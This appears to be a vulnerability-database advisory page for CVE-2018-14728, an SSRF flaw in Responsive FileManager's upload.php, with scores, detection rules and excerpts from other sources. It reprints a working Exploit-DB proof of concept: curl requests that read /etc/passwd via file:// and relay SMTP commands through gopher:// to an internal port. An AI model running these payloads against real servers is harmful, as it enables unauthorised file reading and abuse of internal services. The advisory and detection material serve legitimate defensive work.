CVE-2018-14728
published 2018-08-03CVE-2018-14728: upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter.
PriorityP277critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
76.51%
99.5th percentile
upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tecrail | responsive_filemanager | — | — |
| tecrail | responsive_filemanager | — | — |
| tecrail | responsive_filemanager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandfldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a↗
yara
regex: root:.*:0:0:
- →Monitor POST requests to /filemanager/upload.php containing a 'url' parameter with schemes such as file://, gopher://, or internal IP ranges (e.g., 169.254.169.254) in the request body, indicating SSRF exploitation attempts.
- →Detect SSRF bypass attempts where a .ico filename is appended to PATH_INFO of upload.php to circumvent file-extension blocking controls. ↗
- →Watch for DNS pinning bypass attempts where an attacker-controlled hostname resolves to 0.0.0.0 to reach internal services via the url parameter of upload.php. ↗
- →Alert on POST bodies to upload.php containing gopher:// scheme URLs targeting internal ports (e.g., port 25), which can be used to relay SMTP commands via SSRF. ↗
- →Successful exploitation of CVE-2018-14728 may return /etc/passwd content in the HTTP response body; detect responses matching the pattern root:.*:0:0: from upload.php endpoints.
- ·CVE-2018-14728 was incompletely fixed; CVE-2020-10212 covers bypass techniques (PATH_INFO .ico suffix and DNS pinning to 0.0.0.0) that still affect versions 9.13.4 and 9.14.0, so detections must account for both the original and bypass variants. ↗
- ·File-extension blocking in upload.php is bypassable via PATH_INFO manipulation (e.g., appending .ico), meaning extension-based WAF/IDS rules alone are insufficient to block SSRF payloads. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-66f3-j5p3-p6pc: upload
ghsa_unreviewed·2022-05-24·CVSS 9.8
CVE-2020-10212 [CRITICAL] GHSA-66f3-j5p3-p6pc: upload
upload.php in Responsive FileManager 9.13.4 and 9.14.0 allows SSRF via the url parameter because file-extension blocking is mishandled and because it is possible for a DNS hostname to resolve to an internal IP address. For example, an SSRF attempt may succeed if a .ico filename is added to the PATH_INFO. Also, an attacker could create a DNS hostname that resolves to the 0.0.0.0 IP address for DNS pinning. NOTE: this issue exists because of an incomplete fix for CVE-2018-14728.
GHSA
GHSA-4954-r44g-wx43: upload
ghsa_unreviewed·2022-05-14
CVE-2018-14728 [CRITICAL] CWE-918 GHSA-4954-r44g-wx43: upload
upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter.
No detection rules found.
Exploit-DB
Responsive Filemanager 9.13.1 - Server-Side Request Forgery
exploitdb·2018-07-30·CVSS 9.8
CVE-2018-14728 [CRITICAL] Responsive Filemanager 9.13.1 - Server-Side Request Forgery
Responsive Filemanager 9.13.1 - Server-Side Request Forgery
---
# Exploit Title: Responsive filemanager 9.13.1 - Server-Side Request Forgery
# Date: 2018-07-29
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsive_filemanager.zip
# Version: 9.13.1
# Tested on: responsive filemanager version: 9.13.1, php version: 7.0
# CVE : CVE-2018-14728
# PoC
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=file:///etc/passwd'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5
Nuclei
Responsive filemanager 9.13.1 Server-Side Request Forgery
nuclei·CVSS 9.8
CVE-2018-14728 [CRITICAL] Responsive filemanager 9.13.1 Server-Side Request Forgery
Responsive filemanager 9.13.1 Server-Side Request Forgery
Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
Template:
id: CVE-2018-14728
info:
name: Responsive filemanager 9.13.1 Server-Side Request Forgery
author: madrobot
severity: critical
description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
impact: |
An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
remediation: |
Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability.
reference:
- http://packetstormsecurity.com/files/148742/Responsive-
No writeups or analysis indexed.
2018-08-03
Published